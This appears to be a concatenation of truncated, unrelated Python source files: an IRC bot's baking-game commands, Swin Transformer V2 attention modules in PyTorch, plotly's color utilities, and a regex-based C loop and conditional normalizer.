output += "{} (×{}, {:.0f}%), ".format(nohighlight(i[0]), i[1], percentage)
ctr += 1
output = output[:-2] # trim ', '
await out.msg(self, modname, c, [f"top {query} owners: {output}"])
async def richest(self, c, n, m):
total = 0
stats = {}
if len(m) > 0:
results = oveninv.find(item=m)
else:
results = oveninv.find()
for item in list(results):
price = DEFAULT_PRICE
if item["item"] in baked_goods:
price = baked_goods[item["item"]] / 10
if not item["name"] in stats:
stats[item["name"]] = 0
stats[item["name"]] += price
total += price
output = ""
ctr = 0
until = 7
for i in sorted(stats.items(), key=lambda i: i[1], reverse=True):
if ctr == until:
break
percentage = (i[1] * 100) / total
output += "{} (${:.2f}, {:.1f}%), ".format(nohighlight(i[0]), i[1], percentage)
ctr += 1
output = output[:-2] # trim ', '
await out.msg(
self, modname, c, [f"richest users: {output} (total wealth: ${total:,.2f})"]
)
async def recipe(self, c, n, m):
_input = m.split()
if len(_input) < 2:
await out.msg(self, modname, c, [msgs["BAKE_NEED_TWO"]])
return
items = {}
for thing in _input:
if thing == "ducc":
await out.msg(self, modname, c, ["baking a ducc? how could you?!"])
return
if not thing in items:
items[thing] = 0
items[thing] += 1
try:
newitems = _get_baking_results(items)
except SmokingOven:
await out.msg(self, modname, c, ["something doesn't seem right..."])
return
newitems_fmt = _format_items(newitems)
await out.msg(self, modname, c, [f"those items *might* give a {newitems_fmt}..."])
async def bake(self, c, n, m):
_input = m.split()
if len(_input) < 2:
await out.msg(self, modname, c, [msgs["BAKE_NEED_TWO"]])
return
items = {}
for thing in _input:
if not thing in items:
items[thing] = 0
items[thing] += 1
# verify that they have enough items
for thing in items:
found = _count_item(n, thing)
if found == 0:
await out.msg(self, modname, c, [msgs["DONT_HAVE_ANY"].format(thing)])
return
elif found < items[thing]:
await out.msg(self, modname, c, [msgs["DONT_HAVE_ENOUGH"].format(thing)])
return
try:
newitems = _bake_items(n, items)
except NotEnoughItems:
pass # FIXME
except TriedBakeDucc:
await out.msg(self, modname, c, [msgs["BAKE_MURDER"].format(n)])
await out.msg(self, modname, c, [msgs["BAKE_EXPLODE"]])
oveninv.delete(name=n)
return
except SmokingOven:
await out.msg(self, modname, c, [msgs["BAKE_SMOKING"]])
return
newitems_fmt = _format_items(newitems)
await out.msg(self, modname, c, [msgs["BAKE_RESULT"].format(newitems_fmt)])
async def bakeall(self, c, n, m):
item = m.split()[0]
if len(item) < 1:
await out.msg(self, modname, c, ["need item"])
return
found = _count_item(n, item)
if found == 0:
await out.msg(self, modname, c, [msgs["DONT_HAVE_ANY"].format(item)])
return
elif found < 2:
await out.msg(self, modname, c, [msgs["DONT_HAVE_ENOUGH"].format(item)])
return
items = {item: found}
| |
<filename>swin_transformer_v2/model_parts.py
from typing import Tuple, Optional, List, Union, Any
import torch
import torch.nn as nn
import torch.utils.checkpoint as checkpoint
import timm
__all__: List[str] = ["SwinTransformerStage", "SwinTransformerBlock"]
class FeedForward(nn.Sequential):
"""
Feed forward module used in the transformer encoder.
"""
def __init__(self,
in_features: int,
hidden_features: int,
out_features: int,
dropout: float = 0.) -> None:
"""
Constructor method
:param in_features: (int) Number of input features
:param hidden_features: (int) Number of hidden features
:param out_features: (int) Number of output features
:param dropout: (float) Dropout factor
"""
# Call super constructor and init modules
super().__init__(
nn.Linear(in_features=in_features, out_features=hidden_features),
nn.GELU(),
nn.Dropout(p=dropout),
nn.Linear(in_features=hidden_features, out_features=out_features),
nn.Dropout(p=dropout)
)
def bchw_to_bhwc(input: torch.Tensor) -> torch.Tensor:
"""
Permutes a tensor to the shape [batch size, height, width, channels]
:param input: (torch.Tensor) Input tensor of the shape [batch size, height, width, channels]
:return: (torch.Tensor) Output tensor of the shape [batch size, height, width, channels]
"""
return input.permute(0, 2, 3, 1)
def bhwc_to_bchw(input: torch.Tensor) -> torch.Tensor:
"""
Permutes a tensor to the shape [batch size, channels, height, width]
:param input: (torch.Tensor) Input tensor of the shape [batch size, height, width, channels]
:return: (torch.Tensor) Output tensor of the shape [batch size, channels, height, width]
"""
return input.permute(0, 3, 1, 2)
def unfold(input: torch.Tensor,
window_size: int) -> torch.Tensor:
"""
Unfolds (non-overlapping) a given feature map by the given window size (stride = window size)
:param input: (torch.Tensor) Input feature map of the shape [batch size, channels, height, width]
:param window_size: (int) Window size to be applied
:return: (torch.Tensor) Unfolded tensor of the shape [batch size * windows, channels, window size, window size]
"""
# Get original shape
_, channels, height, width = input.shape # type: int, int, int, int
# Unfold input
output: torch.Tensor = input.unfold(dimension=3, size=window_size, step=window_size) \
.unfold(dimension=2, size=window_size, step=window_size)
# Reshape to [batch size * windows, channels, window size, window size]
output: torch.Tensor = output.permute(0, 2, 3, 1, 5, 4).reshape(-1, channels, window_size, window_size)
return output
def fold(input: torch.Tensor,
window_size: int,
height: int,
width: int) -> torch.Tensor:
"""
Fold a tensor of windows again to a 4D feature map
:param input: (torch.Tensor) Input tensor of windows [batch size * windows, channels, window size, window size]
:param window_size: (int) Window size to be reversed
:param height: (int) Height of the feature map
:param width: (int) Width of the feature map
:return: (torch.Tensor) Folded output tensor of the shape [batch size, channels, height, width]
"""
# Get channels of windows
channels: int = input.shape[1]
# Get original batch size
batch_size: int = int(input.shape[0] // (height * width // window_size // window_size))
# Reshape input to
output: torch.Tensor = input.view(batch_size, height // window_size, width // window_size, channels,
window_size, window_size)
output: torch.Tensor = output.permute(0, 3, 1, 4, 2, 5).reshape(batch_size, channels, height, width)
return output
class WindowMultiHeadAttention(nn.Module):
"""
This class implements window-based Multi-Head-Attention.
"""
def __init__(self,
in_features: int,
window_size: int,
number_of_heads: int,
dropout_attention: float = 0.,
dropout_projection: float = 0.,
meta_network_hidden_features: int = 256,
sequential_self_attention: bool = False) -> None:
"""
Constructor method
:param in_features: (int) Number of input features
:param window_size: (int) Window size
:param number_of_heads: (int) Number of attention heads
:param dropout_attention: (float) Dropout rate of attention map
:param dropout_projection: (float) Dropout rate after projection
:param meta_network_hidden_features: (int) Number of hidden features in the two layer MLP meta network
:param sequential_self_attention: (bool) If true sequential self-attention is performed
"""
# Call super constructor
super(WindowMultiHeadAttention, self).__init__()
# Check parameter
assert (in_features % number_of_heads) == 0, \
"The number of input features (in_features) are not divisible by the number of heads (number_of_heads)."
# Save parameters
self.in_features: int = in_features
self.window_size: int = window_size
self.number_of_heads: int = number_of_heads
self.sequential_self_attention: bool = sequential_self_attention
# Init query, key and value mapping as a single layer
self.mapping_qkv: nn.Module = nn.Linear(in_features=in_features, out_features=in_features * 3, bias=True)
# Init attention dropout
self.attention_dropout: nn.Module = nn.Dropout(dropout_attention)
# Init projection mapping
self.projection: nn.Module = nn.Linear(in_features=in_features, out_features=in_features, bias=True)
# Init projection dropout
self.projection_dropout: nn.Module = nn.Dropout(dropout_projection)
# Init meta network for positional encodings
self.meta_network: nn.Module = nn.Sequential(
nn.Linear(in_features=2, out_features=meta_network_hidden_features, bias=True),
nn.ReLU(inplace=True),
nn.Linear(in_features=meta_network_hidden_features, out_features=number_of_heads, bias=True))
# Init pair-wise relative positions (log-spaced)
self.__make_pair_wise_relative_positions()
# Init tau
self.register_parameter("tau", torch.nn.Parameter(torch.ones(1, number_of_heads, 1, 1)))
def __make_pair_wise_relative_positions(self) -> None:
"""
Method initializes the pair-wise relative positions to compute the positional biases
"""
indexes: torch.Tensor = torch.arange(self.window_size)
coordinates: torch.Tensor = torch.stack(torch.meshgrid([indexes, indexes]), dim=0)
coordinates: torch.Tensor = torch.flatten(coordinates, start_dim=1)
relative_coordinates: torch.Tensor = coordinates[:, :, None] - coordinates[:, None, :]
relative_coordinates: torch.Tensor = relative_coordinates.permute(1, 2, 0).reshape(-1, 2).float()
relative_coordinates_log: torch.Tensor = torch.sign(relative_coordinates) \
* torch.log(1. + relative_coordinates.abs())
self.register_buffer("relative_coordinates_log", relative_coordinates_log)
def update_resolution(self, new_window_size: int, **kwargs: Any) -> None:
"""
Method updates the window size and so the pair-wise relative positions
:param new_window_size: (int) New window size
:param kwargs: (Any) Unused
"""
# Set new window size
self.window_size: int = new_window_size
# Make new pair-wise relative positions
self.__make_pair_wise_relative_positions()
def __get_relative_positional_encodings(self) -> torch.Tensor:
"""
Method computes the relative positional encodings
:return: (torch.Tensor) Relative positional encodings [1, number of heads, window size ** 2, window size ** 2]
"""
relative_position_bias: torch.Tensor = self.meta_network(self.relative_coordinates_log)
relative_position_bias: torch.Tensor = relative_position_bias.permute(1, 0)
relative_position_bias: torch.Tensor = relative_position_bias.reshape(self.number_of_heads,
self.window_size * self.window_size,
self.window_size * self.window_size)
return relative_position_bias.unsqueeze(0)
def __self_attention(self,
query: torch.Tensor,
key: torch.Tensor,
value: torch.Tensor,
batch_size_windows: int,
tokens: int,
mask: Optional[torch.Tensor] = None) -> torch.Tensor:
"""
This function performs standard (non-sequential) scaled cosine self-attention
:param query: (torch.Tensor) Query tensor of the shape [batch size * windows, heads, tokens, channels // heads]
:param key: (torch.Tensor) Key tensor of the shape [batch size * windows, heads, tokens, channels // heads]
:param value: (torch.Tensor) Value tensor of the shape [batch size * windows, heads, tokens, channels // heads]
:param batch_size_windows: (int) Size of the first dimension of the input tensor (batch size * windows)
:param tokens: (int) Number of tokens in the input
:param mask: (Optional[torch.Tensor]) Attention mask for the shift case
:return: (torch.Tensor) Output feature map of the shape [batch size * windows, tokens, channels]
"""
# Compute attention map with scaled cosine attention
attention_map: torch.Tensor = torch.einsum("bhqd, bhkd -> bhqk", query, key) \
/ torch.maximum(torch.norm(query, dim=-1, keepdim=True)
* torch.norm(key, dim=-1, keepdim=True),
torch.tensor(1e-06, device=query.device, dtype=query.dtype))
attention_map: torch.Tensor = attention_map / self.tau.clamp(min=0.01)
# Apply relative positional encodings
attention_map: torch.Tensor = attention_map + self.__get_relative_positional_encodings()
# Apply mask if utilized
if mask is not None:
number_of_windows: int = mask.shape[0]
attention_map: torch.Tensor = attention_map.view(batch_size_windows // number_of_windows, number_of_windows,
self.number_of_heads, tokens, tokens)
attention_map: torch.Tensor = attention_map + mask.unsqueeze(1).unsqueeze(0)
attention_map: torch.Tensor = attention_map.view(-1, self.number_of_heads, tokens, tokens)
attention_map: torch.Tensor = attention_map.softmax(dim=-1)
# Perform attention dropout
attention_map: torch.Tensor = self.attention_dropout(attention_map)
# Apply attention map and reshape
output: torch.Tensor = torch.einsum("bhal, bhlv -> bhav", attention_map, value)
output: torch.Tensor = output.permute(0, 2, 1, 3).reshape(batch_size_windows, tokens, -1)
return output
def __sequential_self_attention(self,
query: torch.Tensor,
key: torch.Tensor,
value: torch.Tensor,
batch_size_windows: int,
tokens: int,
mask: Optional[torch.Tensor] = None) -> torch.Tensor:
"""
This function performs sequential scaled cosine self-attention
:param query: (torch.Tensor) Query tensor of the shape [batch size * windows, heads, tokens, channels // heads]
:param key: (torch.Tensor) Key tensor of the shape [batch size * windows, heads, tokens, channels // heads]
:param value: (torch.Tensor) Value tensor of the shape [batch size * windows, heads, tokens, channels // heads]
:param batch_size_windows: (int) Size of the first dimension of the input tensor (batch size * windows)
:param tokens: (int) Number of tokens in the input
:param mask: (Optional[torch.Tensor]) Attention mask for the shift case
:return: (torch.Tensor) Output feature map of the shape [batch size * windows, tokens, channels]
"""
# Init output tensor
output: torch.Tensor = torch.ones_like(query)
# Compute relative positional encodings fist
relative_position_bias: torch.Tensor = self.__get_relative_positional_encodings()
# Iterate over query and key tokens
for token_index_query in range(tokens):
# Compute attention map with scaled cosine attention
attention_map: torch.Tensor = \
torch.einsum("bhd, bhkd -> bhk", query[:, :, token_index_query], key) \
/ torch.maximum(torch.norm(query[:, :, token_index_query], dim=-1, keepdim=True)
* torch.norm(key, dim=-1, keepdim=False),
torch.tensor(1e-06, device=query.device, dtype=query.dtype))
attention_map: torch.Tensor = attention_map / self.tau.clamp(min=0.01)[..., 0]
# Apply positional encodings
attention_map: torch.Tensor = attention_map + relative_position_bias[..., token_index_query, :]
# Apply mask if utilized
if mask is not None:
| |
<filename>LDDMM_Python/lddmm_python/lib/plotly/colors.py
"""
colors
=====
Functions that manipulate colors and arrays of colors
There are three basic types of color types: rgb, hex and tuple:
rgb - An rgb color is a string of the form 'rgb(a,b,c)' where a, b and c are
floats between 0 and 255 inclusive.
hex - A hex color is a string of the form '#xxxxxx' where each x is a
character that belongs to the set [0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f]. This is
just the list of characters used in the hexadecimal numeric system.
tuple - A tuple color is a 3-tuple of the form (a,b,c) where a, b and c are
floats between 0 and 1 inclusive.
"""
from __future__ import absolute_import
from plotly import exceptions
from numbers import Number
DEFAULT_PLOTLY_COLORS = ['rgb(31, 119, 180)', 'rgb(255, 127, 14)',
'rgb(44, 160, 44)', 'rgb(214, 39, 40)',
'rgb(148, 103, 189)', 'rgb(140, 86, 75)',
'rgb(227, 119, 194)', 'rgb(127, 127, 127)',
'rgb(188, 189, 34)', 'rgb(23, 190, 207)']
PLOTLY_SCALES = {
'Greys': [
[0, 'rgb(0,0,0)'], [1, 'rgb(255,255,255)']
],
'YlGnBu': [
[0, 'rgb(8,29,88)'], [0.125, 'rgb(37,52,148)'],
[0.25, 'rgb(34,94,168)'], [0.375, 'rgb(29,145,192)'],
[0.5, 'rgb(65,182,196)'], [0.625, 'rgb(127,205,187)'],
[0.75, 'rgb(199,233,180)'], [0.875, 'rgb(237,248,217)'],
[1, 'rgb(255,255,217)']
],
'Greens': [
[0, 'rgb(0,68,27)'], [0.125, 'rgb(0,109,44)'],
[0.25, 'rgb(35,139,69)'], [0.375, 'rgb(65,171,93)'],
[0.5, 'rgb(116,196,118)'], [0.625, 'rgb(161,217,155)'],
[0.75, 'rgb(199,233,192)'], [0.875, 'rgb(229,245,224)'],
[1, 'rgb(247,252,245)']
],
'YlOrRd': [
[0, 'rgb(128,0,38)'], [0.125, 'rgb(189,0,38)'],
[0.25, 'rgb(227,26,28)'], [0.375, 'rgb(252,78,42)'],
[0.5, 'rgb(253,141,60)'], [0.625, 'rgb(254,178,76)'],
[0.75, 'rgb(254,217,118)'], [0.875, 'rgb(255,237,160)'],
[1, 'rgb(255,255,204)']
],
'Bluered': [
[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']
],
# modified RdBu based on
# www.sandia.gov/~kmorel/documents/ColorMaps/ColorMapsExpanded.pdf
'RdBu': [
[0, 'rgb(5,10,172)'], [0.35, 'rgb(106,137,247)'],
[0.5, 'rgb(190,190,190)'], [0.6, 'rgb(220,170,132)'],
[0.7, 'rgb(230,145,90)'], [1, 'rgb(178,10,28)']
],
# Scale for non-negative numeric values
'Reds': [
[0, 'rgb(220,220,220)'], [0.2, 'rgb(245,195,157)'],
[0.4, 'rgb(245,160,105)'], [1, 'rgb(178,10,28)']
],
# Scale for non-positive numeric values
'Blues': [
[0, 'rgb(5,10,172)'], [0.35, 'rgb(40,60,190)'],
[0.5, 'rgb(70,100,245)'], [0.6, 'rgb(90,120,245)'],
[0.7, 'rgb(106,137,247)'], [1, 'rgb(220,220,220)']
],
'Picnic': [
[0, 'rgb(0,0,255)'], [0.1, 'rgb(51,153,255)'],
[0.2, 'rgb(102,204,255)'], [0.3, 'rgb(153,204,255)'],
[0.4, 'rgb(204,204,255)'], [0.5, 'rgb(255,255,255)'],
[0.6, 'rgb(255,204,255)'], [0.7, 'rgb(255,153,255)'],
[0.8, 'rgb(255,102,204)'], [0.9, 'rgb(255,102,102)'],
[1, 'rgb(255,0,0)']
],
'Rainbow': [
[0, 'rgb(150,0,90)'], [0.125, 'rgb(0,0,200)'],
[0.25, 'rgb(0,25,255)'], [0.375, 'rgb(0,152,255)'],
[0.5, 'rgb(44,255,150)'], [0.625, 'rgb(151,255,0)'],
[0.75, 'rgb(255,234,0)'], [0.875, 'rgb(255,111,0)'],
[1, 'rgb(255,0,0)']
],
'Portland': [
[0, 'rgb(12,51,131)'], [0.25, 'rgb(10,136,186)'],
[0.5, 'rgb(242,211,56)'], [0.75, 'rgb(242,143,56)'],
[1, 'rgb(217,30,30)']
],
'Jet': [
[0, 'rgb(0,0,131)'], [0.125, 'rgb(0,60,170)'],
[0.375, 'rgb(5,255,255)'], [0.625, 'rgb(255,255,0)'],
[0.875, 'rgb(250,0,0)'], [1, 'rgb(128,0,0)']
],
'Hot': [
[0, 'rgb(0,0,0)'], [0.3, 'rgb(230,0,0)'],
[0.6, 'rgb(255,210,0)'], [1, 'rgb(255,255,255)']
],
'Blackbody': [
[0, 'rgb(0,0,0)'], [0.2, 'rgb(230,0,0)'],
[0.4, 'rgb(230,210,0)'], [0.7, 'rgb(255,255,255)'],
[1, 'rgb(160,200,255)']
],
'Earth': [
[0, 'rgb(0,0,130)'], [0.1, 'rgb(0,180,180)'],
[0.2, 'rgb(40,210,40)'], [0.4, 'rgb(230,230,50)'],
[0.6, 'rgb(120,70,20)'], [1, 'rgb(255,255,255)']
],
'Electric': [
[0, 'rgb(0,0,0)'], [0.15, 'rgb(30,0,100)'],
[0.4, 'rgb(120,0,100)'], [0.6, 'rgb(160,90,0)'],
[0.8, 'rgb(230,200,0)'], [1, 'rgb(255,250,220)']
],
'Viridis': [
[0, '#440154'], [0.06274509803921569, '#48186a'],
[0.12549019607843137, '#472d7b'], [0.18823529411764706, '#424086'],
[0.25098039215686274, '#3b528b'], [0.3137254901960784, '#33638d'],
[0.3764705882352941, '#2c728e'], [0.4392156862745098, '#26828e'],
[0.5019607843137255, '#21918c'], [0.5647058823529412, '#1fa088'],
[0.6274509803921569, '#28ae80'], [0.6901960784313725, '#3fbc73'],
[0.7529411764705882, '#5ec962'], [0.8156862745098039, '#84d44b'],
[0.8784313725490196, '#addc30'], [0.9411764705882353, '#d8e219'],
[1, '#fde725']
]
}
def color_parser(colors, function):
"""
Takes color(s) and a function and applies the function on the color(s)
In particular, this function identifies whether the given color object
is an iterable or not and applies the given color-parsing function to
the color or iterable of colors. If given an iterable, it will only be
able to work with it if all items in the iterable are of the same type
- rgb string, hex string or tuple
"""
if isinstance(colors, str):
return function(colors)
if isinstance(colors, tuple) and isinstance(colors[0], Number):
return function(colors)
if hasattr(colors, '__iter__'):
if isinstance(colors, tuple):
new_color_tuple = tuple(function(item) for item in colors)
return new_color_tuple
else:
new_color_list = [function(item) for item in colors]
return new_color_list
def validate_colors(colors):
"""
Validates color(s) and returns an error for invalid colors
"""
colors_list = []
if isinstance(colors, str):
if colors in PLOTLY_SCALES:
return
elif 'rgb' in colors or '#' in colors:
colors_list = [colors]
else:
raise exceptions.PlotlyError(
"If your colors variable is a string, it must be a "
"Plotly scale, an rgb color or a hex color."
)
elif isinstance(colors, tuple):
if isinstance(colors[0], Number):
colors_list = [colors]
else:
colors_list = list(colors)
if isinstance(colors, dict):
colors_list.extend(colors.values())
elif isinstance(colors, list):
colors_list = colors
# Validate colors in colors_list
for j, each_color in enumerate(colors_list):
if 'rgb' in each_color:
each_color = color_parser(
each_color, unlabel_rgb
)
for value in each_color:
if value > 255.0:
raise exceptions.PlotlyError(
"Whoops! The elements in your rgb colors "
"tuples cannot exceed 255.0."
)
elif '#' in each_color:
each_color = color_parser(
each_color, hex_to_rgb
)
elif isinstance(each_color, tuple):
for value in each_color:
if value > 1.0:
raise exceptions.PlotlyError(
"Whoops! The elements in your colors tuples "
"cannot exceed 1.0."
)
return colors
def convert_colors_to_same_type(colors, colortype='rgb'):
"""
Converts color(s) to the specified color type
Takes a single color or an iterable of colors and outputs a list of the
color(s) converted all to an rgb or tuple color type. If colors is a
Plotly Scale name then the cooresponding colorscale will be outputted and
colortype will not be applicable
"""
colors_list = []
if isinstance(colors, str):
if colors in PLOTLY_SCALES:
return PLOTLY_SCALES[colors]
elif 'rgb' in colors or '#' in colors:
colors_list = [colors]
else:
raise exceptions.PlotlyError(
"If your colors variable is a string, it must be a Plotly "
"scale, an rgb color or a hex color.")
elif isinstance(colors, tuple):
if isinstance(colors[0], Number):
colors_list = [colors]
else:
colors_list = list(colors)
elif isinstance(colors, list):
colors_list = colors
# convert all colors to rgb
for j, each_color in enumerate(colors_list):
if '#' in each_color:
each_color = color_parser(
each_color, hex_to_rgb
)
each_color = color_parser(
each_color, label_rgb
)
colors_list[j] = each_color
elif isinstance(each_color, tuple):
each_color = color_parser(
each_color, convert_to_RGB_255
)
each_color = color_parser(
each_color, label_rgb
)
colors_list[j] = each_color
if colortype == 'rgb':
return colors_list
elif colortype == 'tuple':
for j, each_color in enumerate(colors_list):
each_color = color_parser(
each_color, unlabel_rgb
)
each_color = color_parser(
each_color, unconvert_from_RGB_255
)
colors_list[j] = each_color
return colors_list
else:
raise exceptions.PlotlyError("You must select either rgb or tuple "
"for your colortype variable.")
def convert_dict_colors_to_same_type(colors, colortype='rgb'):
"""
Converts color(s) to the specified color type
Takes a single color or an iterable of colors and outputs a list of the
color(s) converted all to an rgb or tuple color type. If colors is a
Plotly Scale name then the cooresponding colorscale will be outputted
"""
for key in colors:
if '#' in colors[key]:
colors[key] = color_parser(
colors[key], hex_to_rgb
)
colors[key] = color_parser(
colors[key], label_rgb
)
elif isinstance(colors[key], tuple):
colors[key] = color_parser(
colors[key], convert_to_RGB_255
)
colors[key] = color_parser(
colors[key], label_rgb
)
if colortype == 'rgb':
return colors
elif colortype == 'tuple':
for key in colors:
colors[key] = color_parser(
colors[key], unlabel_rgb
)
colors[key] = color_parser(
colors[key], unconvert_from_RGB_255
)
return colors
else:
raise exceptions.PlotlyError("You must select either rgb or tuple "
"for your colortype variable.")
def make_colorscale(colors, scale=None):
"""
Makes a colorscale from a list of colors and a scale
Takes a list of colors and scales and constructs a colorscale based
on the colors in sequential order. If 'scale' is left empty, a linear-
interpolated colorscale will be generated. If 'scale' is a specificed
list, it must be the same legnth as colors and must contain all floats
For documentation regarding to the form of the output, see
https://plot.ly/python/reference/#mesh3d-colorscale
"""
colorscale = []
# validate minimum colors length of 2
if len(colors) < 2:
raise exceptions.PlotlyError("You must input a list of colors that "
"has at least two colors.")
if not scale:
scale_incr = 1./(len(colors) - 1)
return [[i * scale_incr, color] for i, color in enumerate(colors)]
else:
# validate scale
if len(colors) != len(scale):
raise exceptions.PlotlyError("The length of colors and scale "
"must be the same.")
if (scale[0] != 0) or (scale[-1] != 1):
raise exceptions.PlotlyError(
"The first and last number in scale must be 0.0 and 1.0 "
"respectively."
)
for j in range(1, len(scale)):
if scale[j] <= scale[j-1]:
raise exceptions.PlotlyError(
"'scale' must be a list that contains an increasing "
"sequence of numbers where the first and last number are"
"0.0 and 1.0 respectively."
)
colorscale = [list(tup) for tup in zip(scale, colors)]
return colorscale
def find_intermediate_color(lowcolor, highcolor, intermed):
"""
Returns the color at | |
' + pentadList[i].text #for lines that start directly with "do"
for j in range (len(pentadList[i].text)):
########### Variables ####################
#line = pentadList[i].text
presentChar = pentadList[i].text[j]
if(debugMode) : print("line = ", i, " | j =", j, " | len = ", len(pentadList[i].text), " | read : " , presentChar)
if (j < len(pentadList[i].text)-1) : firstChar = pentadList[i].text[j+1]
else: firstChar = None
if (j < len(pentadList[i].text)-2) : secondChar = pentadList[i].text[j+2]
else: secondChar = None
if (j < len(pentadList[i].text)-3) : thirdChar = pentadList[i].text[j+3]
else: thirdChar = None
##########################################
if(state == "Nothing" and re.search(r'(?:\W|\0|^|\s)', str(presentChar)) and firstChar == 'd' and secondChar == 'o' and (thirdChar == None or re.search(r'(\W)', str(thirdChar))!=None)):
if(debugMode) : print(re.search(r'\W|\0|$', str(thirdChar)))
state = "Before Loop"
doLine = i
doChar1 = j+1
doChar2 = j+2
if(debugMode) : print("DOWHILE printing --> ", "do found : line", doLine, ", Char ", doChar1)
elif(re.search(r'(?:\W|\0|^|\s)', str(presentChar)) and firstChar == 'd' and secondChar == 'o' and (thirdChar == None or re.search(r'(\W)', str(thirdChar))!=None)):
if(debugMode) : print("DOWHILE printing --> ", "another do found : line", i, ", Char ", j)
recursiveCase = True
if(state == "Before Loop" and bracketCounter == 0 and presentChar == '{'):
state = "Inside Loop"
if(debugMode) : print("DOWHILE printing --> ", state)
bracketCounter = 1
#opBracketLine = i
#opBracketChar = j
elif(state == "Inside Loop" and bracketCounter != 0 and presentChar == '{'):
bracketCounter = bracketCounter + 1
if(state == "Inside Loop" and bracketCounter == 1 and presentChar == '}'):
state = "After Loop"
if(debugMode) : print("DOWHILE printing --> ", state, " with end_bracket at line ", i, " and at char ", j)
bracketCounter = 0
endBracketLine = i
endBracketChar = j
elif(state == "Inside Loop" and bracketCounter != 1 and presentChar == '}'):
bracketCounter = bracketCounter - 1
if(state == "After Loop" and re.search(r'(?<=\W)while[\\\s]*?(\(.*?\)[\\\s]*?;)', pentadList[endBracketLine].text[endBracketChar:])):
state = "After condition"
doWhileConditionANDWhileKeywordMatch = re.search(r'(?<=\W|\0)(?P<all>while[\\\s]*?(?P<cond>\(.*?\))[\\\s]*?;)', pentadList[i].text[endBracketChar:])
doWhileCondition = doWhileConditionANDWhileKeywordMatch.group('cond')
doWhileConditionANDWhileKeyword = doWhileConditionANDWhileKeywordMatch.group('all')
doWhileConditionANDWhileKeywordLine = i
if(debugMode) : print("DOWHILE printing --> ", "Match :", doWhileCondition)
if(debugMode) : print("DOWHILE printing --> ", "That gonna be detroyed :", doWhileConditionANDWhileKeyword)
pentadList[i].text = pentadList[i].text[:endBracketChar] + pentadList[i].text[endBracketChar:].replace(doWhileConditionANDWhileKeyword, "", 1)
if(debugMode) : print("DOWHILE printing --> ", "After line :", pentadList[i].text)
pentadList[doLine].text = pentadList[doLine].text[ : doChar1] \
+ "for" + doWhileCondition \
+ pentadList[doLine].text[doChar2+1 : ]
pentadList[doWhileConditionANDWhileKeywordLine].addRole("while of do from line", str(doLine))
break
if(state == "After condition"):
recursiveCase = True #we run the function one more time since we didnt analyse the entire code yet
break
if(recursiveCase):
return doWhileConverter(pentadList, debugMode, executedManyTimes)
return spaceNormalizer(pentadList)
def whileLoopConverter(pentadList = [], debugMode = False):
"""The objective here is to convert while loops in for loops using regex."""
i = 0
if(debugMode) : print("")
for i in range (len(pentadList)):
if(debugMode) : print("line = ", i, " | len = ", len(pentadList[i].text), " | read : " , pentadList[i].text)
pattern = re.compile(r'(?P<char>\W|\0|^)while\s*(?=(\(|\\|\0|$))')
found = re.search(pattern, pentadList[i].text)
safetyBreakPoint = 0
while(found != None):
if(debugMode) : print ("found : " + found.group('char') + "while")
if(debugMode) : print("line before : ", pentadList[i].text)
pentadList[i].text = re.sub(pattern, found.group('char')+"for", pentadList[i].text, 1)
if(debugMode) : print("line after : ", pentadList[i].text)
pattern = re.compile(r'(?P<char>\W|\0|^)while\s*(?=(\(|\\|\0|$))')
found = re.search(pattern, pentadList[i].text)
safetyBreakPoint = safetyBreakPoint + 1
if safetyBreakPoint == 1000 : break
return spaceNormalizer(pentadList)
def ifNormalizer(pentadList = [], debugMode = False):
"""The objective here is to convert do-while loops in for loops using regex."""
if(debugMode) : print("\nIF printing --> ", "Starting")
i = 0
for i in range (len(pentadList)):
pentadList[i].text = ' ' + pentadList[i].text #like always, it doesn't harm
pattern = re.compile(r"""
(?P<keyword> #########################################################
(?:[\s]|[\\]|\0|^)+ # start of a keyword
(?:if) # if
(?:[\s]|[\\])* # 0 or more spaces
)
(?P<condition> #########################################################
(?:\() # an open parenthesis
(?:[\s]|[\\])* # 0 or more spaces
(?:[^\)\(])*? # anything but a parenthesis or nothing
(?:[\s]|[\\])* # 0 or more spaces
(?: #----------------------
(?:\() # # a parenthesis
(?:[\s]|[\\])* # # 0 or more spaces
(?:[^\)\(])*? # # anything but a parenthesis or nothing
(?:[\s]|[\\])* # # 0 or more spaces
(?:\)) # # a parenthesis
)* #------ 0 or more -----
(?:[\s]|[\\])* # 0 or more spaces
(?:[^\)\(])*? # anything but a parenthesis or nothing
(?:[\s]|[\\])* # 0 or more spaces
(?:\)) # a close parenthesis
)
(?P<instruction> #########################################################
(?:[\s]|[\\])* # 0 or more spaces
(?:.)+? # anything but lazy
(?:[\s]|[\\])* # 0 or more spaces
)
(?:;|$|\n|{) # a semicolon or the end of line
""", re.VERBOSE)
if(re.search(pattern, pentadList[i].text)):
found = re.findall(pattern, pentadList[i].text)
for h in found :
if(debugMode) : print("\nIF printing --> ", "st before = ", pentadList[i].text)
pentadList[i].text = re.sub(pattern, h[0] + h[1] + ' { '+ h[2] +'; } ', pentadList[i].text)
if(debugMode) : print("\nIF printing --> ", "st after = ", pentadList[i].text)
return semicolonBasedChopper(pentadList, debugMode)
def elseNormalizer(pentadList = [], debugMode = False, executedManyTimes = 0):
"""The objective here is to convert do-while loops in for loops using regex."""
executedManyTimes = executedManyTimes + 1
if(executedManyTimes == 30) : return []
presentChar = "//"
memory1 = "//"
memory2 = "//"
memory3 = "//"
memory4 = "//"
memory5 = "//"
mode = "nothing"
bracketCounter = 0
paranthesisCounter = 0
lastElseFound = 0
i = 0
j = 0
recursiveCase = False
elseExpected = False
doubt = "no doubt"
if(debugMode) : print("\nELSE printing --> ", "Starting")
while i < len(pentadList):
if(i > 1500): break #safety in case of BS
pentadList[i].text = ' ' + pentadList[i].text #for lines that start directly with "else"
pentadList[i].text = ' ' + pentadList[i].text.replace(" else{", " else {")
j = 0
while j < len(pentadList[i].text):
if(j > 1000): break #safety in case of BS
########### Variables ####################
#line = pentadList[i].text
memory1 = memory2
memory2 = memory3
memory3 = memory4
memory4 = memory5
memory5 = presentChar
presentChar = pentadList[i].text[j]
if(debugMode) : print("ELSE printing --> ", "line = ", i, "| read : " , presentChar, " | in memory : " , memory1, memory2, memory3, memory4, memory5)
########### Let's start ####################
if(mode == "nothing" or mode == "closingLastElse"):
if(presentChar == ' ' and memory1 == ' ' and memory2 == 'e' and memory3 == 'l' and memory4 == 's' and memory5 == 'e'):
if(mode == "nothing") :
mode = "readElse"
if(debugMode) : print("\nELSE printing --> ", "else detected : readElse mode activated !\n")
